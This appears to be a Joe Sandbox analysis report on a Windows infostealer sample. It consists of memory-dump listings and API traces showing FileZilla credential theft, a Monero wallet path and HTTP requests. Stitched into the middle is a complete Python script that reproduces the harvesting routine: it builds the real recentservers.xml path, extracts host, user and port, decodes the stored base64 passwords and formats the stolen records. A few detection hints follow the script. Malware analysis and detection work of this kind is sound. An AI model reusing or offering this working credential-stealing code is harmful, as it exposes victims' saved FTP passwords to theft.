                          • Instruction ID: 8bfb53655b53820b6bcd87cc2f2273713cd331d09916f0db2b11c7ec7d4e0a21
                          • Opcode Fuzzy Hash: 00437aaeff16a0cde72ef56a90c29a8a2b9b0733760ae3763bc30d4dc4c5bce9
                          • Instruction Fuzzy Hash: FC5144F36483089FE308AD7CED9973ABBC4D744624F59063DFA81C7B84F93999058246
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Q)a.
                          • API String ID: 0-3310984605
                          • Opcode ID: d8b18c8d17f148ca8c36ffbd6681d40bc52b153cc18df912ec3153635cdcf9f5
                          • Instruction ID: 190e267fa0cc54ae7cdfa8a6640a27370e3e6590b1c928cc0437245ea472685f
                          • Opcode Fuzzy Hash: d8b18c8d17f148ca8c36ffbd6681d40bc52b153cc18df912ec3153635cdcf9f5
                          • Instruction Fuzzy Hash: 814107F7A182185FE7007A2DDC427BAB3D9DBD4721F0B453DE794C3B44EA399801869A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 06f4954965d12f3af7bfbaaf16673c17ea1b6fd4994170f835b1cf65051e54d5
                          • Instruction ID: b5e4e2a57a454a62e03fac032df91a58bb72bd879e46d8047cadf6c3d1365871
                          • Opcode Fuzzy Hash: 06f4954965d12f3af7bfbaaf16673c17ea1b6fd4994170f835b1cf65051e54d5
                          • Instruction Fuzzy Hash: DA51E9B3A0C3109FE3046E29DC8577ABBE5EF94320F1A493EE6C5C3780E97958454796
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b95df0a3be28a8334b375fe91ac547f8717f38cf6467944ab754491b4c299d4
                          • Instruction ID: fb0156cbc8fa1d4a59ad9507820dacef4f4283b3fe6e9c2fedf1184518623022
                          • Opcode Fuzzy Hash: 5b95df0a3be28a8334b375fe91ac547f8717f38cf6467944ab754491b4c299d4
                          • Instruction Fuzzy Hash: 7C5139F3A083005FE3086E39ED9973ABAD5DB84324F17063DEA85C3784ED7948018686
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c109536606018681fdae8973696843452f85a0beda2b0b74f9a7dee32893f62
                          • Instruction ID: 60e6d7b05e021442d698049caaecffb810b09863820aa484e4235bc2598dbb11
                          • Opcode Fuzzy Hash: 6c109536606018681fdae8973696843452f85a0beda2b0b74f9a7dee32893f62
                          • Instruction Fuzzy Hash: 604138F3E192005BE704692EDC55766BBD79BD8330F3B863DEA94D7388ED3458058285
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 782861f511a7d445c6ac3bc383a74a6cf5fc776e6ddf0e899ff9b422d5cc11bb
                          • Instruction ID: 7d17ac5c99a46dbcebea0db4eae327d7deba41f07f73b485ed2c1a923b92c3ea
                          • Opcode Fuzzy Hash: 782861f511a7d445c6ac3bc383a74a6cf5fc776e6ddf0e899ff9b422d5cc11bb
                          • Instruction Fuzzy Hash: ED414BF26085049FE704AE2EEC4176AB7E6FFD4320F168A3DD6C5C3394E97954168683
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae98f08dcd91172ea00b3004cdf2212f3d955746787eee0b8ab340283b07e637
                          • Instruction ID: bf954409ca9fb36b8996f44bdd99f58f194ae72f67dfabff5209c2eed066eb56
                          • Opcode Fuzzy Hash: ae98f08dcd91172ea00b3004cdf2212f3d955746787eee0b8ab340283b07e637
                          • Instruction Fuzzy Hash: 624194F39082149BD3186E29DC567BAFBE5EF48320F06052EEAC583790EA3508108BD6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00930DBA,00930DB7,00930DB6,00930DB3), ref: 00920362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00920369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00920385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 009203CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 009203DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00920419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00920463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00920562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00920571
                          • lstrcat.KERNEL32(?,url: ), ref: 00920580
                          • lstrcat.KERNEL32(?,00000000), ref: 00920593
                          • lstrcat.KERNEL32(?,00931678), ref: 009205A2
                          • lstrcat.KERNEL32(?,00000000), ref: 009205B5
                          • lstrcat.KERNEL32(?,0093167C), ref: 009205C4
                          • lstrcat.KERNEL32(?,login: ), ref: 009205D3
                          • lstrcat.KERNEL32(?,00000000), ref: 009205E6
                          • lstrcat.KERNEL32(?,00931688), ref: 009205F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00920604
                          • lstrcat.KERNEL32(?,00000000), ref: 00920617
                          • lstrcat.KERNEL32(?,00931698), ref: 00920626
                          • lstrcat.KERNEL32(?,0093169C), ref: 00920635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: a9c613b3efecb34bdc0cd114016ac1569d4aa1121a3499a79ae87a393c0b0ccb
                          • Instruction ID: 0c0944822851f74238c755931ec97b72f81bed4bc1211dc882d5c337644aed79
                          • Opcode Fuzzy Hash: a9c613b3efecb34bdc0cd114016ac1569d4aa1121a3499a79ae87a393c0b0ccb
                          • Instruction Fuzzy Hash: DDD11072900218ABCB04FBE4ED96FEE7778AF98305F404558F102B7099DF74AA09CB65
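The routine above is FileZilla credential harvesting: a path ending in \AppData\Roaming\FileZilla\recentservers.xml is built from a folder returned by SHGetFolderPathA, the file is read whole (CreateFileA, GetFileSizeEx, LocalAlloc, ReadFile), StrStrA locates the <Host>, <Port>, <User> and <Pass encoding="base64"> markers, and a chain of lstrcat calls assembles a record that starts with the literals browser: FileZilla and profile: null. The Python below is an added example, not code from the sample or from Joe Sandbox, that reproduces that logic on a constructed recentservers.xml so an analyst can see what the collected record looks like. Two assumptions: the separators joined between fields are not visible in the trace (only their addresses 00931678, 0093167C, 00931688, 00931698 and 0093169C are), so ":" and newlines are assumed; and the base folder is taken from %APPDATA% rather than re-implementing the SHGetFolderPathA call with CSIDL 0x1C. The same read-whole-file, StrStrA-between-markers, base64-decode shape recurs in the routine at 0091CA6C further down this listing, and the helper models that shape too.

```python
"""Reproduction of the FileZilla harvesting routine traced in the report.

Added example, not code from the sample or from Joe Sandbox. It mirrors the
API sequence: read recentservers.xml, find <Host>, <Port>, <User> and
<Pass encoding="base64"> by plain substring search (the sample uses StrStrA,
not an XML parser), base64-decode the password and emit a 'browser: FileZilla'
record. Field separators (":" and "\\n") are assumptions; the trace only shows
their addresses.
"""
import base64
import os
from typing import Optional

# Constructed sample in the layout FileZilla 3 writes; not taken from the report.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Pass encoding="base64">c3VwZXJzZWNyZXQ=</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def default_path() -> str:
    """Where the sample looks. The trace appends
    \\AppData\\Roaming\\FileZilla\\recentservers.xml to a folder resolved with
    SHGetFolderPathA; using %APPDATA% here is an assumption for portability."""
    return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "recentservers.xml")


def _between(buf: str, open_tag: str, close_tag: str, start: int = 0) -> Optional[tuple]:
    """StrStrA-style scan: the text between open_tag and close_tag plus the
    offset just past close_tag, or None if either marker is missing."""
    i = buf.find(open_tag, start)
    if i < 0:
        return None
    i += len(open_tag)
    j = buf.find(close_tag, i)
    if j < 0:
        return None
    return buf[i:j], j + len(close_tag)


def parse_recentservers(xml_text: str) -> list:
    """One <Server> block at a time, each field located inside that block only,
    so a server with no <User> cannot borrow the next server's credentials."""
    records = []
    pos = 0
    while (blk := _between(xml_text, "<Server>", "</Server>", pos)) is not None:
        body, pos = blk
        host = _between(body, "<Host>", "</Host>")
        if host is None:
            continue
        port = _between(body, "<Port>", "</Port>")
        user = _between(body, "<User>", "</User>")
        enc = _between(body, '<Pass encoding="base64">', "</Pass>")
        # Only the password is encoded; the sample decodes it with
        # CryptStringToBinaryA. Malformed base64 yields an empty password.
        try:
            password = base64.b64decode(enc[0], validate=True).decode("utf-8", "replace") if enc else ""
        except ValueError:
            password = ""
        records.append({
            "host": host[0],
            "port": port[0] if port else "",
            "user": user[0] if user else "",
            "password": password,
        })
    return records


def format_record(rec: dict) -> str:
    """Layout reconstructed from the lstrcat sequence at 00920562..00920635;
    the ':' and newline separators are assumed, not read from the trace."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {rec['password']}\n\n"
    )


def harvest_filezilla(xml_text: str = SAMPLE_RECENTSERVERS) -> str:
    """Full record set in the sample's output format."""
    return "".join(format_record(r) for r in parse_recentservers(xml_text))


if __name__ == "__main__":
    print(harvest_filezilla())
```

FileZilla keeps these passwords with nothing more than base64 encoding unless a master password is configured, which is why the sample needs no decryption step at all. For detection, any process other than filezilla.exe opening recentservers.xml is a reasonable file-access rule, and the marker strings above together with the browser: FileZilla and profile: null literals are stable YARA candidates for this family.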
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009159F8
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 00915A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00915B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01050B40,00000000,?,0104B370,00000000,?,00931A1C), ref: 00915E71
                          • lstrlen.KERNEL32(00000000), ref: 00915E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00915E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00915E9A
                          • lstrlen.KERNEL32(00000000), ref: 00915EAF
                          • lstrlen.KERNEL32(00000000), ref: 00915ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00915EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00915F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00915F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00915F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00915FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00915FBD
                          • HttpOpenRequestA.WININET(00000000,010509A0,?,010500C8,00000000,00000000,00400100,00000000), ref: 00915BF8
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • InternetCloseHandle.WININET(00000000), ref: 00915FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
